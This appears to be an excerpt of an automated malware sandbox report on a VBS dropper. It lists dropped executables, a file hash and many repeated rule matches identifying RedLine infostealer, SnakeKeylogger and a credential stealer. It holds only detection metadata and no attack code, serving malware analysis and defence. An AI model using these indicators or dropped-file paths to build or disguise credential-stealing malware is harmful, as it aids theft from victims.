Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFFB09	10_2_25BFFB09
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFCB50	10_2_25BFCB50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFCB40	10_2_25BFCB40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFF6B0	10_2_25BFF6B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFC2A0	10_2_25BFC2A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFC292	10_2_25BFC292
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFC6F8	10_2_25BFC6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFC6E9	10_2_25BFC6E9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFF6C0	10_2_25BFF6C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFBE3A	10_2_25BFBE3A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF0E31	10_2_25BF0E31
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFEE10	10_2_25BFEE10

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\fptrsiaN.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: String function: 0040FB9C appears 40 times
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: String function: 0040D606 appears 96 times
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: String function: 0040E1D8 appears 172 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 029C424C appears 64 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 029D3F1C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 029C45D0 appears 828 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 029D3E98 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 029C4444 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 029C4270 appears 31 times
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: String function: 028945D0 appears 574 times
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: String function: 028A3E98 appears 50 times
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: String function: 02894444 appears 154 times

Source: Draft doc PI ITS15235.vbs

Initial sample: Strings found which are bigger than 50

Source: NETUTILS.dll.1.dr

Static PE information: Number of sections : 19 > 10

Source: 6.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.x.exe.213963a8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.x.exe.213d31d8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Naisrtpf.PIF.210cab18.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Naisrtpf.PIF.210cab18.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.x.exe.213963a8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
